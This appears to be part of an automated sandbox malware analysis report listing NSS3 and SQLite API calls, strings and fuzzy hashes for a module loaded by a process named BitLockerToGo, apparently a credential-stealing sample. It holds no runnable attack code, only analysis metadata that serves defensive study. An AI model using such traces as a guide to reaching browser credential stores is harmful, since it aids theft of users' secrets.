                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,?), ref: 6C5E30EE
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C5E3131
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001086C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C5E3178
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: memcpy$memsetsqlite3_log
                                                                                                                                                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 984749767-598938438
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 1e9971498fbf96370200ea63e12492005225e9127e708e68d554edae0991006e
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: c7c13eccb3ab8581d81ebc04648c4a68bce3e6c166a9990682680c4106950fe2
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1e9971498fbf96370200ea63e12492005225e9127e708e68d554edae0991006e
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7DB19BB0E052199BCB08CF9DCC85AAEB7B1BB4C304F14846DE859A7B55D774A941CBA0
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: __allrem
                                                                                                                                                                                                                                                                                                                                                          • String ID: @ul$Pul$winSeekFile$winTruncate1$winTruncate2$winUnmapfile1$winUnmapfile2$ul
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2933888876-1957657009
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C5CCA30: EnterCriticalSection.KERNEL32(?,?,?,6C62F9C9,?,6C62F4DA,6C62F9C9,?,?,6C5F369A), ref: 6C5CCA7A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C5CCA30: LeaveCriticalSection.KERNEL32(?), ref: 6C5CCB26
                                                                                                                                                                                                                                                                                                                                                          • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C636A02
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C636AA6
                                                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 6C636AF9
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(00000000), ref: 6C636B15
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_log.NSS3(0000001B,delayed %dms for lock/sharing conflict at line %d,?,0000BCCC), ref: 6C636BA6
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave$memsetsqlite3_freesqlite3_log
                                                                                                                                                                                                                                                                                                                                                          • String ID: Pul$`ul$delayed %dms for lock/sharing conflict at line %d$winDelete
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1816828315-2236588079
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PK11_IsInternalKeySlot.NSS3(?,?,00000000,?), ref: 6C65FCBD
                                                                                                                                                                                                                                                                                                                                                          • strchr.VCRUNTIME140(?,0000003A,?,?,00000000,?), ref: 6C65FCCC
                                                                                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,00000000,?), ref: 6C65FCEF
                                                                                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C65FD32
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,00000001), ref: 6C65FD46
                                                                                                                                                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(00000001), ref: 6C65FD51
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,00000000,-00000001), ref: 6C65FD6D
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C65FD84
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Alloc_Utilmemcpystrlen$ArenaInternalK11_Slotstrchr
                                                                                                                                                                                                                                                                                                                                                          • String ID: :
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 183580322-336475711
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C640F62
                                                                                                                                                                                                                                                                                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C640F84
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C69B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C7718D0,?), ref: 6C69B095
                                                                                                                                                                                                                                                                                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(?,6C65F59B,6C76890C,?), ref: 6C640FA8
                                                                                                                                                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(4C8B1474), ref: 6C640FC1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A0BE0: malloc.MOZGLUE(6C698D2D,?,00000000,?), ref: 6C6A0BF8
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A0BE0: TlsGetValue.KERNEL32(6C698D2D,?,00000000,?), ref: 6C6A0C15
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,4C8B1474), ref: 6C640FDB
                                                                                                                                                                                                                                                                                                                                                          • PR_CallOnce.NSS3(6C7A2AA4,6C6A12D0), ref: 6C640FEF
                                                                                                                                                                                                                                                                                                                                                          • PL_FreeArenaPool.NSS3(?), ref: 6C641001
                                                                                                                                                                                                                                                                                                                                                          • PL_FinishArenaPool.NSS3(?), ref: 6C641009
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: ArenaPoolUtil$DecodeItem_Quick$Alloc_CallErrorFinishFreeInitOnceValuemallocmemcpy
                                                                                                                                                                                                                                                                                                                                                          • String ID: security
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2061345354-3315324353
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 338c16c76c49020bed8e7b5f99ea3d75768e9f9d098d8fa17e08294c73ac6bea
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 8ffc1e16ef1e94c208669ac8d139971e45ab3cdd14be109832b57fc5cb4bc53f
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 338c16c76c49020bed8e7b5f99ea3d75768e9f9d098d8fa17e08294c73ac6bea
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3921F5B1904204ABE7109F69DD40EAE7BB4EF46758F00C529FC1897601FB31EA56CBD6
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_ArenaDupItem_Util.NSS3(?,6C647D8F,6C647D8F,?,?), ref: 6C646DC8
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C69FDF0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6C69FE08
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C69FDF0: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6C69FE1D
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C69FDF0: memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6C69FE62
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000010,?,?,6C647D8F,?,?), ref: 6C646DD5
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: TlsGetValue.KERNEL32(?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A10F3
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: EnterCriticalSection.KERNEL32(?,?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A110C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: PL_ArenaAllocate.NSS3(?,?,?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A1141
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: PR_Unlock.NSS3(?,?,?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A1182
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: TlsGetValue.KERNEL32(?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A119C
                                                                                                                                                                                                                                                                                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C768FA0,00000000,?,?,?,?,6C647D8F,?,?), ref: 6C646DF7
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C69B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C7718D0,?), ref: 6C69B095
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C646E35
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C69FDF0: PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6C69FE29
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C69FDF0: PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6C69FE3D
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C69FDF0: free.MOZGLUE(00000000,?,?,?,?), ref: 6C69FE6F
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C646E4C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: PL_ArenaAllocate.NSS3(?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A116E
                                                                                                                                                                                                                                                                                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C768FE0,00000000), ref: 6C646E82
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C646AF0: SECITEM_ArenaDupItem_Util.NSS3(00000000,6C64B21D,00000000,00000000,6C64B219,?,6C646BFB,00000000,?,00000000,00000000,?,?,?,6C64B21D), ref: 6C646B01
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C646AF0: SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,00000000), ref: 6C646B8A
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C646F1E
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C646F35
                                                                                                                                                                                                                                                                                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C768FE0,00000000), ref: 6C646F6B
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000,6C647D8F,?,?), ref: 6C646FE1
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Util$Arena$Item_$Alloc_$DecodeQuick$AllocateErrorValue$CriticalEnterSectionUnlockfreememcpy
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 587344769-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 5a15a3c7446fe9de75e8ba931163b3a1201241ce6d7f3940bc8bab5877a33fad
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 7ff46ea2bf292870caf7504f84bae10b96f75bc97c21171849c2e3152ed0eb68
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5a15a3c7446fe9de75e8ba931163b3a1201241ce6d7f3940bc8bab5877a33fad
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 41719271D106469FDB00CF55CD40BEABBA5BF95308F15822AE848DBB11F770EA94CB98
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C681057
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C681085
                                                                                                                                                                                                                                                                                                                                                          • PK11_GetAllTokens.NSS3 ref: 6C6810B1
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C681107
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(00000000,00000000), ref: 6C681172
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C681182
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C6811A6
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_ItemsAreEqual_Util.NSS3(?,?), ref: 6C6811C5
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6852C0: TlsGetValue.KERNEL32(?,00000001,00000002,?,?,?,?,?,?,?,?,?,?,6C65EAC5,00000001), ref: 6C6852DF
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6852C0: EnterCriticalSection.KERNEL32(?), ref: 6C6852F3
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6852C0: PR_Unlock.NSS3(?), ref: 6C685358
                                                                                                                                                                                                                                                                                                                                                          • PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C6811D3
                                                                                                                                                                                                                                                                                                                                                          • PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C6811F3
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Utilfree$Alloc_Error$CriticalEnterEqual_ItemsK11_SectionTokensUnlockValuestrlen
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1549229083-0
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,6C66CDBB,?,6C66D079,00000000,00000001), ref: 6C68AE10
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,6C66CDBB,?,6C66D079,00000000,00000001), ref: 6C68AE24
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,?,6C66D079,00000000,00000001), ref: 6C68AE5A
                                                                                                                                                                                                                                                                                                                                                          • memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C66CDBB,?,6C66D079,00000000,00000001), ref: 6C68AE6F
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(85145F8B,?,?,?,?,6C66CDBB,?,6C66D079,00000000,00000001), ref: 6C68AE7F
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,6C66CDBB,?,6C66D079,00000000,00000001), ref: 6C68AEB1
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C66CDBB,?,6C66D079,00000000,00000001), ref: 6C68AEC9
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6C66CDBB,?,6C66D079,00000000,00000001), ref: 6C68AEF1
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(6C66CDBB,?,?,?,?,?,?,?,?,?,?,?,?,?,6C66CDBB,?), ref: 6C68AF0B
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6C66CDBB,?,6C66D079,00000000,00000001), ref: 6C68AF30
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Unlock$CriticalEnterSectionValuefree$memset
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 161582014-0
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,00000000,00000000,?,6C66AB7F,?,00000000,?), ref: 6C664CB4
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(0000001C,?,6C66AB7F,?,00000000,?), ref: 6C664CC8
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,6C66AB7F,?,00000000,?), ref: 6C664CE0
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,6C66AB7F,?,00000000,?), ref: 6C664CF4
                                                                                                                                                                                                                                                                                                                                                          • PL_HashTableLookup.NSS3(?,?,?,6C66AB7F,?,00000000,?), ref: 6C664D03
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,00000000,?), ref: 6C664D10
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6EDD70: TlsGetValue.KERNEL32 ref: 6C6EDD8C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6EDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C6EDDB4
                                                                                                                                                                                                                                                                                                                                                          • PR_Now.NSS3(?,00000000,?), ref: 6C664D26
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C750A27), ref: 6C709DC6
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C750A27), ref: 6C709DD1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C709DED
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,00000000,?), ref: 6C664D98
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,00000000,?), ref: 6C664DDA
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,00000000,?), ref: 6C664E02
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Unlock$CriticalSectionTimeValue$EnterSystem$FileHashLeaveLookupTableUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4032354334-0
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PK11_CreateDigestContext.NSS3(00000004,00000000,00000000,00000000,00000000,?,6C66AE9B,00000000,?,?), ref: 6C6689DE
                                                                                                                                                                                                                                                                                                                                                          • PK11_DigestBegin.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,6C642D6B,?,?,00000000), ref: 6C6689EF
                                                                                                                                                                                                                                                                                                                                                          • PK11_DigestOp.NSS3(00000000,57016AC6,034C08E8,?,00000000,?,?,?,?,?,?,?,?,?,?,6C642D6B), ref: 6C668A02
                                                                                                                                                                                                                                                                                                                                                          • PK11_DestroyContext.NSS3(00000000,00000001,?,00000000,?,?,?,?,?,?,?,?,?,?,6C642D6B,?), ref: 6C668A11
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
• Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: K11_$Digest$Context$BeginCreateDestroy
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 407214398-0
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C642CDA,?,00000000), ref: 6C642E1E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C69FD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6C649003,?), ref: 6C69FD91
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C69FD80: PORT_Alloc_Util.NSS3(A4686C6A,?), ref: 6C69FDA2
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C69FD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686C6A,?,?), ref: 6C69FDC4
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_DupItem_Util.NSS3(?), ref: 6C642E33
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C69FD80: free.MOZGLUE(00000000,?,?), ref: 6C69FDD1
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C642E4E
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C642E5E
                                                                                                                                                                                                                                                                                                                                                          • PL_HashTableLookup.NSS3(?), ref: 6C642E71
                                                                                                                                                                                                                                                                                                                                                          • PL_HashTableRemove.NSS3(?), ref: 6C642E84
                                                                                                                                                                                                                                                                                                                                                          • PL_HashTableAdd.NSS3(?,00000000), ref: 6C642E96
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C642EA9
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C642EB6
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C642EC5
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
• Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Util$HashItem_Table$Alloc_$CriticalEnterErrorLookupRemoveSectionUnlockValueZfreefreememcpy
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3332421221-0
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_initialize.NSS3 ref: 6C62FD18
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_initialize.NSS3 ref: 6C62FD5F
                                                                                                                                                                                                                                                                                                                                                          • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C62FD89
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,00000000,?), ref: 6C62FD99
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(00000000), ref: 6C62FE3C
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(?), ref: 6C62FEE3
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(?), ref: 6C62FEEE
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
• Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: sqlite3_free$sqlite3_initialize$memcpymemset
                                                                                                                                                                                                                                                                                                                                                          • String ID: simple
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1130978851-3246079234
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: ea96bb3437583e11064b65585cbfe1b2780d4193f936dcbde4538dfab934f294
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: a133d345fd7e1127adff0fb234ffd599c542d6b58be0433807655579703907ae
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ea96bb3437583e11064b65585cbfe1b2780d4193f936dcbde4538dfab934f294
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 75917FB0A012159FDB04CF55C980AAAB7F1FF85318F24856DD8199BB52D739E802CF96
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C635EC9
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,000296F7,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C635EED
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          • %s at line %d of [%.10s], xrefs: 6C635EE0
                                                                                                                                                                                                                                                                                                                                                          • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C635ED1
